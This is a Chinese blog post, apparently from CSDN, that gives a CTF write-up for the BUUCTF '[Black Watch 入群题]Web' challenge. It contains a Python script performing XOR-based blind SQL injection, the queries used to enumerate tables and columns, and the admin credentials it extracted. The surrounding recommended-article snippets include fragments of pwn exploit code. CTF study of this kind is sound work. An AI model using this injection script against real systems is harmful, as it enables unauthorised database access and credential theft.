[Black Watch 入群题]Web

最新推荐文章于 2025-01-19 09:45:00 发布
最新推荐文章于 2025-01-19 09:45:00 发布
阅读量416 收藏 9
点赞数 5
分类专栏: CTF 文章标签: 网络协议 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80148821/article/details/143784151
版权

[Black Watch 入群题]Web

知识点

异或盲注

解题

payloud如下:

import requests
import time

url= "http://f79b2611-fe64-45bb-ad8f-f31eb8f88179.node5.buuoj.cn:81/backend/content_detail.php?id=1"
flag= ""

for i in range(0,100):
    for j in range(0,256):
        payload = f"^if(ascii(substr(database(),{i},1))={j},3,0)"
        txt = requests.get(url=url+payload)
        time.sleep(0.1)
        if '0xpoker' in txt.text:
            flag+=chr(j)
            print(flag)
            
##news database
##admin,content (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
##id,username,password,is_enable (select(group_concat(column_name))from(information_schema.columns)where(table_name=0x61646d696e))
## (select(group_concat(username))from(admin))
username:c238d0af,266a246e
password:bf0512b4,1b011309

除了有点慢,其他都还好。。

2023 年某科技公司前端开发初级岗的面试笔试真(含选择答案、问答解析、机试源码)
黛琳ghz的博客,期待你的关注。
04-28 1万+
这篇文章分享的真是来自 2023 年某科技公司的笔试真,面试的岗位是初级前端,目内容包括了选择、问答、机试,当然与面试官交谈的过程也是必不可少的一部分,主要还是针对简历的项目经验、工作经历来展开提问和交流,这里就不过多描述了。
Web移动端实现高度自适应多行文本
sinat_38178730的博客
05-06 805
Web移动端实现高度自适应多行文本 初衷:最近刚好有H5项目需求是使用这么一个控件;如果H5仅运行在IOS的话,就没必要大费周章了,只要给dom元素增加contenteditable="true"属性,然后设置样式user-select:"auto"就可以了。这时就会有小伙伴发出疑问了,难道contenteditable属性在Android端就不支持了吗?其实不然,安卓也是支持这个属性的,但会逼死...
BUUCTF--[Black Watch ]Web
qq_46263951的博客
07-24 1214
登录时使用burp suite抓包发现是以json传的数据 进去之后我们发现单击这三个热点分别会有以下三种响应 因为id=1,所以这里是一个整形注这里使用的异或盲注
BUUCTF-[Black Watch ]PWN
Fzuim的博客
04-14 450
常规检查下来,发现可以进行栈溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造栈溢出攻击。此目栈溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:栈迁移!!! 栈迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这的另一块内存空间就是bss段。 利用到栈迁移,我们需要在原本栈的eip位置覆盖成 leave;r.
[Black Watch ]PWN
、moddemod
06-20 391
利用bss进行栈迁移 exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './spwn' p = process(proc_name) # p = remote('node3.buuoj.cn', 29482) elf = ELF(proc_name) write_plt = elf.plt['wri.
1+X证书web前端开发(中级)部分习整理(源来自奥鹏教育)
qq_49228887的博客
08-25 1万+
目录MySQL数据库基础与应用PHP技术与应用WEB前后端数据交互技术响应开发技术 MySQL数据库基础与应用 1.【单选】下列哪个是MySQL的配置文件(B) (8分) A COPYING B my-default.ini C README D bin 2. 【单选】以下哪项不是mysql的特点(D) (8分) A Mysql是开源的 B使用方便 C功能全面 D MySQL是非关系型数据库 3. 【单选】MySQL的密码在下边哪个文件中可以找到(C) (8分)
基于k8s的web服务器集构建和高可用负载均衡的实现
pending6的博客
09-28 994
项目描述/项目功能:模拟k8s生产环境,部署web,mysql,nfs,harbor,Prometheus等应用,构建一个高可用高性能的web系统,同时能监控整个k8s集的使用。项目环境:Harbor 2.4.1,nfs v4等环境准备:5台全新的Linux服务器,关闭firewall和seLinux,配置静态ip地址,修改主机名,添加hosts解析IP地址规划:ServerIPk8s-masterk8s-node-1k8s-node-2ansible修改主机名升级系统。
基于 Vue3 + Canvas + Web Worker 实现高性能图像黑白转换工具的设计与实现
最新发布
猫晨的技术小屋
01-19 1690
使用vue3+canvas+web worker实现图片转黑白功能。
http,ftp,mail服务器架设为一体软件
05-28
首先,我们先来了解一下花生壳的到底有什么作用。因为ADSL每次拨号上网所获得的IP地址每次都是不同的,花生壳起到的作用就是方便用户访问我们的服务 器(只需要输域名便可),而不用每次都输IP地址那么麻烦(因为我们也不可能每次重新拨号上网后,又去告诉用户现在的服务器的IP地址什么)。<br><br>例如,我们的花生壳护照下有一个域名www.oray.net ,那么只要在电脑上用该护照登陆了花生壳客户端。当别人输www.oray.net的时候,会自动解析到那台电脑所在的网络的公网IP地址。<br><br>也就是说,具体的服务器,是要我们自己去设置完成的。而不同的上网方式,建立服务器的方式是不同的,下面介绍两种常见上网方法的服务器的建立。(这两个上网方法主要区别在于用来做服务器的计算机,能否得到公网的IP地址)。<br>
[Black Watch ]PWN(栈迁移)
qq_39869547的博客
02-06 1061
栈迁移主要解决溢出空间不足的问, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
Web-12(45-48)-BUUCTF平台
~airrudder~
08-02 577
本篇内容 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 上一篇 | 目录 | 下一篇 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 ======...
CTF wed安全(攻防世界)练习_ctfweb
Innocence_0的博客
05-24 952
网站如图:翻译:在这个小小的挑战训练中,你将学习Robots exclusionstandard。网络爬虫使用robots.txt文件来检查它们是否被允许抓取和索引您的网站或只是其中的一部分。有时这些文件会暴露目录结构,而不是保护内容不被抓取。好好享受吧!**步骤一:**进robots.txt文件,如图:**步骤二:**得到/f10g.php,在进这里面得到flag提交即可成功!!!
CTF刷-汇总
热门推荐
~airrudder~
04-09 1万+
BUUCTF平台的刷之旅 Web
栈迁移学习(buuctf [Black Watch ])
像初雪一样自由洒落
03-14 1083
i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过,这次在看雪看到文章,就好好学一下,做到啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
buuctf [Black Watch ]PWN
qq_42728977的博客
04-10 707
本来想着栈溢出简简单单,然后发现竟然没见过这知识点,堆迁移。 看雪链接
简单记录一下MOCTF的三道web
0verWatch的博客
03-06 3735
本人渣渣,于是记录一下 死亡退出 一道代码审计目 &lt;?php show_source(__FILE__); $c="&lt;?php exit;?&gt;"; @$c.=$_POST['c']; @$filename=$_POST['file']; if(!isset($filename)) { ...
BUU PWN (二)
playmaker的博客
02-07 910
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

follycat

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值